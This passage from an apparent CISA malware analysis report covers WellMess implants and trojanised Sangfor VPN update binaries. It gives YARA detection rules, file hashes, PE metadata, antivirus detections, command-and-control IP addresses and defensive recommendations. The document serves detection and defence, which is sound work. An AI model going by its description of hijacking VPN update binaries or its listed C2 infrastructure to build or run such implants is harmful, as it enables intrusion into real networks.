        MD5_6 = “f18ced8772e9d1a640b8b4a731dfb6e0”
        SHA256_6 = “953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a”
        MD5_7 = “3a9cdd8a5cbc3ab10ad64c4bb641b41f”
        SHA256_7 = “5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb”
        MD5_8 = “967fcf185634def5177f74b0f703bdc0”
        SHA256_8 = “58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2”
        MD5_9 = “c5d5cb99291fa4b2a68b5ea3ff9d9f9a”
        SHA256_9 = “65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75”
        MD5_10 = “01d322dcac438d2bb6bce2bae8d613cb”
        SHA256_10 = “0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494”
        MD5_11 = “8777a9796565effa01b03cf1cea9d24d”
        SHA256_11 = “83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18”
        MD5_12 = “507bb551bd7073f846760d8b357b7aa9”
        SHA256_12 = “47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854”
    strings:
        $0 = “/home/ubuntu/GoProject/src/bot/botlib/chat.go”
        $1 = “/home/ubuntu/GoProject/src/bot/botlib.Post”
        $2 = “GoProject/src/bot/botlib.deleteFile”
        $3 = “ubuntu/GoProject/src/bot/botlib.generateRandomString”
        $4 = “GoProject/src/bot/botlib.AES_Decrypt”
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = “get_keyRC6”
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = “GoProject/src/bot/botlib.wellMess”
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-03-01 10:20:20-05:00
Import Hash daf2da52475fd8981b19ec3c321a983c
Company Name Sangfor Technologies Co.,Ltd
File Description SangforUD
Internal Name SangforUD.exe
Legal Copyright Copyright (C) 2015
Original Filename SangforUD.EXE
Product Name SangforUD application
Product Version 7.6.0.100
PE Sections
MD5 Name Raw Size Entropy
1cd19b3151a670e3d1d2a24953392004 header 1024 3.025361
98e91043bf45d10a621d72a2e3200ed0 .text 232960 6.609761
aa6f1abb810df36035bc35cf27c68d59 .rdata 72704 5.619637
c947f4e73cc3503e16ce6173df639c87 .data 4608 3.792666
1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393
ec6c94b5135c0c75d0a8b7288b77cbae .rsrc 103936 3.885931
b744db87f1a59d6af2a5a37c0da519d1 .reloc 12288 6.571358
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
58d8e65976… Connected_To 103.216.221.19
Description

This file is a 32-bit Windows executable and is similar in design and structure to the file 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75. This application is also designed to replace the update binaries served out from Sangfor SSL VPN devices. This malware uses the hard-coded C2 IP address 103.216.221.19 to download additional payloads.

a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064

Tags

trojan

Details
Name a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064
Size 434688 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 a32e1202257a2945bf0f878c58490af8
SHA1 416df2d22338f412571cdaedb40ab33eb38977af
SHA256 a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064
SHA512 92ac91e36fc9a8463b2a7b00e6dba687e86a15484d836cb2c8d399d76cd012b71523a9ddae43d9795e2c14fdb7ccc2137d668f7c691b47a2e266a4bfe48de71a
ssdeep 6144:4t4156qfXqT02bFXCYv123kUo4GECAOcL6xDE4U:oc6qkt5vdU6ECe4U
Entropy 6.203383
Antivirus
Ahnlab Malware/Win32.Generic
Antiy GrayWare/Win32.Uwasson
ESET Win32/Spy.Agent.PXZ trojan
Ikarus Trojan-Spy.Agent
K7 Riskware ( 0040eff71 )
McAfee RDN/Generic.cf
Microsoft Security Essentials Trojan:Win32/Occamy.C
NetGate Trojan.Win32.Malware
VirusBlokAda Trojan.Agentb
YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = “CISA Code & Media Analysis”
        Date= “2020-07-06”
        Last_Modified=”20200706_1017″
        Actor=”n/a”
        Category=”Trojan”
        Family=”WellMess”
        Description = “Detects WellMess implant and SangFor Exploit”
        MD5_1 = “4d38ac3319b167f6c8acb16b70297111”
        SHA256_1 = “7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee”
        MD5_2 = “a32e1202257a2945bf0f878c58490af8”
        SHA256_2 = “a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064”
        MD5_3 = “861879f402fe3080ab058c0c88536be4”
        SHA256_3 = “14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2”
        MD5_4 = “2f9f4f2a9d438cdc944f79bdf44a18f8”
        SHA256_4 = “e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09”
        MD5_5 = “ae7a46529a0f74fb83beeb1ab2c68c5c”
        SHA256_5 = “fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950”
        MD5_6 = “f18ced8772e9d1a640b8b4a731dfb6e0”
        SHA256_6 = “953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a”
        MD5_7 = “3a9cdd8a5cbc3ab10ad64c4bb641b41f”
        SHA256_7 = “5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb”
        MD5_8 = “967fcf185634def5177f74b0f703bdc0”
        SHA256_8 = “58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2”
        MD5_9 = “c5d5cb99291fa4b2a68b5ea3ff9d9f9a”
        SHA256_9 = “65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75”
        MD5_10 = “01d322dcac438d2bb6bce2bae8d613cb”
        SHA256_10 = “0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494”
        MD5_11 = “8777a9796565effa01b03cf1cea9d24d”
        SHA256_11 = “83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18”
        MD5_12 = “507bb551bd7073f846760d8b357b7aa9”
        SHA256_12 = “47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854”
    strings:
        $0 = “/home/ubuntu/GoProject/src/bot/botlib/chat.go”
        $1 = “/home/ubuntu/GoProject/src/bot/botlib.Post”
        $2 = “GoProject/src/bot/botlib.deleteFile”
        $3 = “ubuntu/GoProject/src/bot/botlib.generateRandomString”
        $4 = “GoProject/src/bot/botlib.AES_Decrypt”
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = “get_keyRC6”
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = “GoProject/src/bot/botlib.wellMess”
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-12 10:02:59-04:00
Import Hash a723dab3d5a36cc8ad0ef65a0d4cfb3d
Company Name Sangfor Technologies Co.,Ltd
File Description SangforUD
Internal Name SangforUD.exe
Legal Copyright Copyright (C) 2015
Original Filename SangforUD.EXE
Product Name SangforUD application
Product Version 7.6.0.100
PE Sections
MD5 Name Raw Size Entropy
ed096fa6a0d25049398750d840d02748 header 1024 3.038012
0f2de5a1546886f5cb9876d918d333bf .text 238080 6.593105
398a48e3a63f160340ba9720a3f13bc8 .rdata 73728 5.589507
6f25e38b602834c202db365468104061 .data 4608 3.709410
1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393
093889615fb3f28b9066f7dc93650099 .rsrc 103936 3.885922
d404cb13c9f033a5b71c2d31cf474e6f .reloc 12800 6.522532
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
a4b790ddff… Connected_To 192.168.169.103
Description

This file is a 32-bit Windows executable and is similar in design and structure to the file 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75. This application is also designed to replace the update binaries served out from Sangfor SSL VPN devices. It uses the private IP address 192.168.169.103 as a C2 server.

192.168.169.103

Whois

Queried whois.arin.net with “n 192.168.169.103″…
NetRange:     192.168.0.0 – 192.168.255.255
CIDR:         192.168.0.0/16
NetName:        PRIVATE-ADDRESS-CBLK-RFC1918-IANA-RESERVED
NetHandle:     NET-192-168-0-0-1
Parent:         NET192 (NET-192-0-0-0-0)
NetType:        IANA Special Use
Organization: Internet Assigned Numbers Authority (IANA)
RegDate:        1994-03-15
Updated:        2013-08-30
Comment:        These addresses are in use by many millions of independently operated networks, which might be as small as a single computer connected to a home gateway, and are automatically configured in hundreds of millions of devices. They are only intended for use within a private context and traffic that needs to cross the Internet will need to use a different, unique address.
Comment:        These addresses can be used by anyone without any need to coordinate with IANA or an Internet registry. The traffic from these addresses does not come from ICANN or IANA. We are not the source of activity you may see on logs or in e-mail records. Please refer to http://www.iana.org/abuse/answers
Comment:        These addresses were assigned by the IETF, the organization that develops Internet protocols, in the Best Current Practice document, RFC 1918 which can be found at:
Comment:        http://datatracker.ietf.org/doc/rfc1918
Ref:            https://rdap.arin.net/registry/ip/192.168.0.0
OrgName:        Internet Assigned Numbers Authority
OrgId:         IANA
Address:        12025 Waterfront Drive
Address:        Suite 300
City:         Los Angeles
StateProv:     CA
PostalCode:     90292
Country:        US
Updated:        2012-08-31
Ref:            https://rdap.arin.net/registry/entity/IANA

Relationships
192.168.169.103 Connected_From a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064
Description

a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064 attempts to connect to the private IP address.

Relationship Summary

65495d173e… Connected_To 103.216.221.19
103.216.221.19 Connected_From 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75
103.216.221.19 Connected_From 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
58d8e65976… Connected_To 103.216.221.19
a4b790ddff… Connected_To 192.168.169.103
192.168.169.103 Connected_From a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • July 16, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.